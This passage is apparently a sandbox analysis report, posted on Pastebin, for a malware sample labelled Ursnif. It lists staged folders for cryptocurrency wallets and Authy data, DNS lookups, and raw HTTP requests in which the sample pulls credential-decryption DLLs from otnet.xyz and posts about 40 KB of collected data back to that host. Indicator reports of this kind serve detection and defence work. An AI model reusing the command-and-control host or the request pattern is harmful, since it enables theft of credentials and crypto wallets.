  644.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Soft\\Authy",
  645.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Soft",
  646.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Anoncoin",
  647.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\BBQCoin",
  648.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Bitcoin",
  649.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DashCore",
  650.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DevCoin",
  651.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DigitalCoin",
  652.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\ElectronCash",
  653.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Electrum",
  654.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\ElectrumLTC",
  655.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Ethereum",
  656.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Exodus",
  657.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\FlorinCoin",
  658.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Franko",
  659.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\FreiCoin",
  660.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\GoldCoinGLD",
  661.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\InfiniteCoin",
  662.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\IOCoin",
  663.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\IxCoin",
  664.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\JAXX",
  665.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Litecoin",
  666.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MegaCoin",
  667.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MinCoin",
  668.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MultiDoge",
  669.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\NameCoin",
  670.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\PrimeCoin",
  671.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\TerraCoin",
  672.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\YACoin",
  673.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Zcash",
  674.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets",
  675.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\CA_00000000-0000-0000-0000-0000000000004771908667.zip",
  676.     "C:\\Users\\user\\AppData\\Local\\Temp\\Ursnif_a85132af1b5651472eb4ad093e1bb0f5.exe"
  677.  
  678.  
  679. * Modified Registry Keys:
  680.     "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Type"
  681.  
  682.  
  683. * Deleted Registry Keys:
  684.  
  685. * DNS Communications:
  686.    
  687.         "type": "A",
  688.         "request": "otnet.xyz",
  689.         "answers":
  690.            
  691.                 "data": "209.141.47.33",
  692.                 "type": "A"
  693.            
  694.        
  695.    
  696.    
  697.         "type": "A",
  698.         "request": "ip-api.com",
  699.         "answers":
  700.            
  701.                 "data": "72.11.140.50",
  702.                 "type": "A"
  703.            
  704.            
  705.                 "data": "66.212.29.250",
  706.                 "type": "A"
  707.            
  708.        
  709.    
  710.  
  711.  
  712. * Domains:
  713.    
  714.         "ip": "209.141.47.33",
  715.         "domain": "otnet.xyz"
  716.    
  717.    
  718.         "ip": "72.11.140.50",
  719.         "domain": "ip-api.com"
  720.    
  721.  
  722.  
  723. * Network Communication - ICMP:
  724.  
  725. * Network Communication - HTTP:
  726.    
  727.         "count": 1,
  728.         "body": "--1BEF0A57BE110FD467A--\r\n",
  729.         "uri": "http://otnet.xyz/141",
  730.         "user-agent": "",
  731.         "method": "POST",
  732.         "host": "otnet.xyz",
  733.         "version": "1.1",
  734.         "path": "/141",
  735.         "data": "POST /141 HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
  736.         "port": 80
  737.    
  738.    
  739.         "count": 1,
  740.         "body": "",
  741.         "uri": "http://otnet.xyz/freebl3.dll",
  742.         "user-agent": "",
  743.         "method": "GET",
  744.         "host": "otnet.xyz",
  745.         "version": "1.1",
  746.         "path": "/freebl3.dll",
  747.         "data": "GET /freebl3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\n\r\n",
  748.         "port": 80
  749.    
  750.    
  751.         "count": 1,
  752.         "body": "",
  753.         "uri": "http://otnet.xyz/freebl3.dll?ddosprotected=1",
  754.         "user-agent": "",
  755.         "method": "GET",
  756.         "host": "otnet.xyz",
  757.         "version": "1.1",
  758.         "path": "/freebl3.dll?ddosprotected=1",
  759.         "data": "GET /freebl3.dll?ddosprotected=1 HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  760.         "port": 80
  761.    
  762.    
  763.         "count": 1,
  764.         "body": "",
  765.         "uri": "http://otnet.xyz/mozglue.dll",
  766.         "user-agent": "",
  767.         "method": "GET",
  768.         "host": "otnet.xyz",
  769.         "version": "1.1",
  770.         "path": "/mozglue.dll",
  771.         "data": "GET /mozglue.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  772.         "port": 80
  773.    
  774.    
  775.         "count": 1,
  776.         "body": "",
  777.         "uri": "http://otnet.xyz/msvcp140.dll",
  778.         "user-agent": "",
  779.         "method": "GET",
  780.         "host": "otnet.xyz",
  781.         "version": "1.1",
  782.         "path": "/msvcp140.dll",
  783.         "data": "GET /msvcp140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  784.         "port": 80
  785.    
  786.    
  787.         "count": 1,
  788.         "body": "",
  789.         "uri": "http://otnet.xyz/nss3.dll",
  790.         "user-agent": "",
  791.         "method": "GET",
  792.         "host": "otnet.xyz",
  793.         "version": "1.1",
  794.         "path": "/nss3.dll",
  795.         "data": "GET /nss3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  796.         "port": 80
  797.    
  798.    
  799.         "count": 1,
  800.         "body": "",
  801.         "uri": "http://otnet.xyz/softokn3.dll",
  802.         "user-agent": "",
  803.         "method": "GET",
  804.         "host": "otnet.xyz",
  805.         "version": "1.1",
  806.         "path": "/softokn3.dll",
  807.         "data": "GET /softokn3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  808.         "port": 80
  809.    
  810.    
  811.         "count": 1,
  812.         "body": "",
  813.         "uri": "http://otnet.xyz/vcruntime140.dll",
  814.         "user-agent": "",
  815.         "method": "GET",
  816.         "host": "otnet.xyz",
  817.         "version": "1.1",
  818.         "path": "/vcruntime140.dll",
  819.         "data": "GET /vcruntime140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  820.         "port": 80
  821.    
  822.    
  823.         "count": 1,
  824.         "body": "--1BEF0A57BE110FD467A--\r\n",
  825.         "uri": "http://ip-api.com/line/",
  826.         "user-agent": "",
  827.         "method": "POST",
  828.         "host": "ip-api.com",
  829.         "version": "1.1",
  830.         "path": "/line/",
  831.         "data": "POST /line/ HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: ip-api.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
  832.         "port": 80
  833.    
  834.    
  835.         "count": 1,
  836.         "body": "",
  837.         "uri": "http://otnet.xyz/",
  838.         "user-agent": "",
  839.         "method": "POST",
  840.         "host": "otnet.xyz",
  841.         "version": "1.1",
  842.         "path": "/",
  843.         "data": "POST / HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 40736\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  844.         "port": 80
  845.    
  846.  
  847.  
  848. * Network Communication - SMTP:
  849.  
  850. * Network Communication - Hosts:
  851.  
  852. * Network Communication - IRC:
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top